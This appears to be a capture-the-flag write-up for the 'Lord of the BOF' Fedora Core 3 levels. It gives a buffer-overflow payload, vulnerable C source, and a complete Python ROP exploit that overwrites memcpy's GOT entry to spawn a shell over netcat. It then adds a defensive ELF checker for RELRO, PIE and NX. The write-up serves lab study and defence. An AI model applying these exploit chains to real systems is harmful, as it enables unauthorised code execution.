[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e '{print "A"x264,"BBBB","\x93\x86\x04\x08","A"x88,"\x64\x98\x04\x08","\x23\x57\x7a\x00"}'`"
[evil_wizard@Fedora_1stFloor hell_fire]$ id
uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t
[evil_wizard@Fedora_1stFloor hell_fire]$ whoami
evil_wizard
[evil_wizard@Fedora_1stFloor hell_fire]$ /bin/my-pass
euid = 504
get down like that
[evil_wizard@Fedora_1stFloor hell_fire]$
Hmm... the orthodox way seems to be solving it with pop-pop-ret...... how is that done?;-_-;
Jump to strcpy@plt?..
While jumping to strcpy@plt
==============================================================================
[evil_wizard@Fedora_1stFloor ~]$ cat dark_stone.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark_stone
        - Remote BOF on Fedora Core 3
        - hint : GOT overwriting again
        - port : TCP 8888
*/
#include <stdio.h>
#include <string.h>  /* not in the original listing; added for a clean build */

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}

int main()
{
    char buffer[256];
    char saved_sfp[4];
    int length;
    char temp[1024];

    printf("dark_stone : how fresh meat you are!\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    fgets(temp, 1024, stdin);

    // for disturbance RET sleding
    length = strlen(temp);

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    // buffer cleaning
    memset((void *)0xf6ffe000, 0, 0xf7000000-0xf6ffe000);   /* cast added; the original passes the integer directly */

    printf("%s\n", buffer);
}
[evil_wizard@Fedora_1stFloor ~]$
This time I'll solve it with pop-pop-ret.... but what's actually different from the problem above ㅡㅡ;
(gdb) disassemble pop_pop_ret
Dump of assembler code for function pop_pop_ret:
0x080484f0 <pop_pop_ret+0>: push %ebp
0x080484f1 <pop_pop_ret+1>: mov %esp,%ebp
0x080484f3 <pop_pop_ret+3>: pop %eax
0x080484f4 <pop_pop_ret+4>: pop %eax
0x080484f5 <pop_pop_ret+5>: ret
0x080484f6 <pop_pop_ret+6>: leave
0x080484f7 <pop_pop_ret+7>: ret
End of assembler dump.
[evil_wizard@Fedora_1stFloor ~]$ (./exploit.py ;cat)| nc localhost 8888
whoami
dark_stone
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
/bin/my-pass
euid = 505
let there be light
[evil_wizard@Fedora_1stFloor ~]$ cat exploit.py
#!/usr/bin/python
import struct
p = lambda x : struct.pack("<L" , x)
# system address in libc : 0x007507c0
# /bin/sh in libc : 0x0071c000 (base) + 0x00117603 (offset) = 0x833603
pop_pop_ret = 0x080484f3 # "\xf3\x84\x04\x08"
strcpy_plt = 0x08048438 # "\x38\x84\x04\x08"
memcpy_got = 0x08049850 # "\x50\x98\x04\x08"
memcpy_plt = 0x8048418
system_0 = 0x8048508 # 0x00
system_1 = 0x80486bf # 0x75
system_2 = 0x8048394 # 0x07
system_3 = 0x804850d # 0xc0
payload = "A"*264 + p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 0) + p(system_3) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 1) + p(system_2) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 2) + p(system_1) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 3) + p(system_0) + \
p(memcpy_plt) + "A"*4 + p(0x833603)
print payload
So this was the last problem..heh-..
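The GOT overwrite in exploit.py only works because memcpy's GOT slot is still writable when main returns. The binary-side mitigation is RELRO: the dynamic loader makes the relocated GOT read-only after start-up (Partial RELRO covers .got; with BIND_NOW, Full RELRO covers .got.plt too). As an added example that is not part of the post, here is a small ELF32 program-header check, written for the elf32-i386 binaries of this level set, that reports PIE, NX-stack and RELRO status from a byte image; it builds synthetic images to exercise itself, so it runs offline. The constants come from the ELF and GNU ABI specifications; the function names (check_elf32, build_sample, sample_report) are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* ELF32 constants from the ELF/GNU ABI specs, defined here so this builds without <elf.h>. */
#define ET_EXEC      2
#define ET_DYN       3
#define PT_DYNAMIC   2
#define PT_GNU_STACK 0x6474e551u
#define PT_GNU_RELRO 0x6474e552u
#define PF_X         1u
#define PF_W         2u
#define PF_R         4u
#define DT_NULL      0
#define DT_BIND_NOW  24
#define DT_FLAGS     30
#define DF_BIND_NOW  8u
#define DT_FLAGS_1   0x6ffffffbu
#define DF_1_NOW     1u

struct mitigations {
    int pie;       /* 1 if e_type is ET_DYN: the image can be loaded at a random base */
    int nx_stack;  /* 1 if PT_GNU_STACK is present and lacks PF_X */
    int relro;     /* 0 none, 1 partial (PT_GNU_RELRO only), 2 full (plus BIND_NOW) */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Walks the program headers (and the dynamic table they point at) of an ELF32 little-endian
 * image. Returns 0 and fills *m, or -1 if the bytes are not a well-formed ELF32 image. */
int check_elf32(const uint8_t *img, size_t len, struct mitigations *m)
{
    int saw_stack = 0, has_relro = 0, bind_now = 0;
    memset(m, 0, sizeof *m);
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[4] != 1 || img[5] != 1)
        return -1;                                   /* not ELF, or not ELFCLASS32 / 2LSB */
    size_t phoff = rd32(img + 28), phentsize = rd16(img + 42), phnum = rd16(img + 44);
    if (phentsize < 32)
        return -1;
    m->pie = rd16(img + 16) == ET_DYN;
    for (size_t i = 0; i < phnum; i++) {
        size_t off = phoff + i * phentsize;
        if (off + 32 > len)
            return -1;                               /* header table runs past the image */
        const uint8_t *ph = img + off;
        uint32_t type = rd32(ph), p_offset = rd32(ph + 4), filesz = rd32(ph + 16), flags = rd32(ph + 24);
        if (type == PT_GNU_STACK) {
            saw_stack = 1;
            m->nx_stack = (flags & PF_X) == 0;
        } else if (type == PT_GNU_RELRO) {
            has_relro = 1;
        } else if (type == PT_DYNAMIC) {
            if (p_offset > len || filesz > len - p_offset)
                return -1;
            for (uint32_t d = 0; d + 8 <= filesz; d += 8) {   /* Elf32_Dyn: d_tag, d_val */
                uint32_t tag = rd32(img + p_offset + d), val = rd32(img + p_offset + d + 4);
                if (tag == DT_NULL)
                    break;
                if (tag == DT_BIND_NOW || (tag == DT_FLAGS && (val & DF_BIND_NOW)) ||
                    (tag == DT_FLAGS_1 && (val & DF_1_NOW)))
                    bind_now = 1;
            }
        }
    }
    if (!saw_stack)
        m->nx_stack = 0;   /* no PT_GNU_STACK: the historical loader default is an executable stack */
    m->relro = has_relro ? (bind_now ? 2 : 1) : 0;
    return 0;
}

/* Constructs a minimal ELF32 image ([header][phdrs][dynamic table]) with the requested
 * properties so the check can be exercised offline. Returns the length, or 0 if cap is too small. */
size_t build_sample(uint8_t *out, size_t cap, int pie, int nx_stack, int relro_level)
{
    size_t nph = 2 + (relro_level > 0 ? 1 : 0);       /* GNU_STACK, DYNAMIC, optional GNU_RELRO */
    size_t phoff = 52, dynoff = phoff + nph * 32, dynlen = 3 * 8;
    if (cap < dynoff + dynlen)
        return 0;
    memset(out, 0, cap);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 1; out[5] = 1; out[6] = 1;               /* ELFCLASS32, ELFDATA2LSB, EV_CURRENT */
    wr16(out + 16, pie ? ET_DYN : ET_EXEC);
    wr16(out + 18, 3);                                /* EM_386 */
    wr32(out + 28, (uint32_t)phoff);
    wr16(out + 40, 52); wr16(out + 42, 32); wr16(out + 44, (uint16_t)nph);
    uint8_t *ph = out + phoff;
    wr32(ph, PT_GNU_STACK); wr32(ph + 24, PF_R | PF_W | (nx_stack ? 0 : PF_X)); ph += 32;
    wr32(ph, PT_DYNAMIC); wr32(ph + 4, (uint32_t)dynoff);
    wr32(ph + 16, (uint32_t)dynlen); wr32(ph + 20, (uint32_t)dynlen); wr32(ph + 24, PF_R | PF_W); ph += 32;
    if (relro_level > 0) { wr32(ph, PT_GNU_RELRO); wr32(ph + 24, PF_R); }
    uint8_t *dyn = out + dynoff;                       /* BIND_NOW expressed via DT_FLAGS / DT_FLAGS_1 */
    wr32(dyn, DT_FLAGS);       wr32(dyn + 4, relro_level == 2 ? DF_BIND_NOW : 0);
    wr32(dyn + 8, DT_FLAGS_1); wr32(dyn + 12, relro_level == 2 ? DF_1_NOW : 0);
    wr32(dyn + 16, DT_NULL);
    return dynoff + dynlen;
}

/* Builds a sample, checks it, and packs the result as pie*100 + nx_stack*10 + relro (-1 on failure). */
int sample_report(int pie, int nx_stack, int relro_level)
{
    uint8_t img[256];
    struct mitigations m;
    size_t n = build_sample(img, sizeof img, pie, nx_stack, relro_level);
    if (n == 0 || check_elf32(img, n, &m) != 0)
        return -1;
    return m.pie * 100 + m.nx_stack * 10 + m.relro;
}

static const uint8_t NOT_ELF[4] = { 1, 2, 3, 4 };   /* constructed non-ELF input for the reject path */
static struct mitigations scratch;

int main(void)
{
    printf("no mitigations : %03d\n", sample_report(0, 0, 0));
    printf("partial relro  : %03d\n", sample_report(0, 1, 1));
    printf("pie+nx+full    : %03d\n", sample_report(1, 1, 2));
    return 0;
}
```

A program header only records what the binary asks for: on the Fedora Core 3 image the non-executable stack in the environment summary is enforced by the kernel (Exec-Shield) whether or not PT_GNU_STACK says so, so this check describes the binary and a /proc maps check describes the process. With Full RELRO the GOT slots that exploit.py patches are mapped read-only before main runs, and the strcpy@plt write sequence faults instead of redirecting memcpy.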